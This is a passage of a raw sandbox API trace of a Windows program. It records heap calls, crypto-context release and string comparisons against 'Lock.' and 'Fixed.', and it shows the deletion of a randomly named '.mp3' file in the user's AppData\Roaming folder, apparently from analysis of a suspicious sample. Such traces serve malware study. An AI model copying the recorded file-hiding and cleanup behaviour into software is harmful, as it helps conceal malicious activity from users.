lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.235] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.235] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.235] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.235] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.235] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.235] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.235] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.236] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.236] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.236] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.236] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.236] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.236] CryptReleaseContext (hProv=0x9bf110, dwFlags=0x0) returned 1 [0149.236] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.236] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.237] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.237] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.237] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.237] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.237] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.237] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.237] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.237] CloseHandle (hObject=0x4fc) returned 1 [0149.238] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.238] CloseHandle (hObject=0x4ec) returned 1 [0149.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.240] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.240] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.240] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NERYDfycG70.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3", lpFilePart=0x8cedf4*="NERYDfycG70.mp3") returned 0x2f [0149.240] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nerydfycg70.mp3")) returned 0x20 [0149.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290572c0, ftCreationTime.dwHighDateTime=0x1d5c9ee, ftLastAccessTime.dwLowDateTime=0x36ad780, ftLastAccessTime.dwHighDateTime=0x1d5d36c, ftLastWriteTime.dwLowDateTime=0x36ad780, ftLastWriteTime.dwHighDateTime=0x1d5d36c, nFileSizeHigh=0x0, nFileSizeLow=0x44c4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="NERYDfycG70.mp3", cAlternateFileName="NERYDF~1.MP3")) returned 0x9e1eb8 [0149.240] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nerydfycg70.mp3")) returned 1 [0149.258] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290572c0, ftCreationTime.dwHighDateTime=0x1d5c9ee, ftLastAccessTime.dwLowDateTime=0x36ad780, ftLastAccessTime.dwHighDateTime=0x1d5d36c, ftLastWriteTime.dwLowDateTime=0x36ad780, ftLastWriteTime.dwHighDateTime=0x1d5d36c, nFileSizeHigh=0x0, nFileSizeLow=0x44c4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="NERYDfycG70.mp3", cAlternateFileName="NERYDF~1.MP3")) returned 0 [0149.258] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0149.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.259] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.259] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.259] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a68440 [0149.261] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NERYDfycG70.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3", lpFilePart=0x8cf650*="NERYDfycG70.mp3") returned 0x2f [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.261] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NERYDfycG70.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nerydfycg70.mp3")) returned 0xffffffff [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0149.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nst7Asd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st7Asd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t7Asd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Asd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Asd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sd C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.262] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77cb0 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nst7Asd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st7Asd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t7Asd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Asd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Asd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sd C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" C.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: 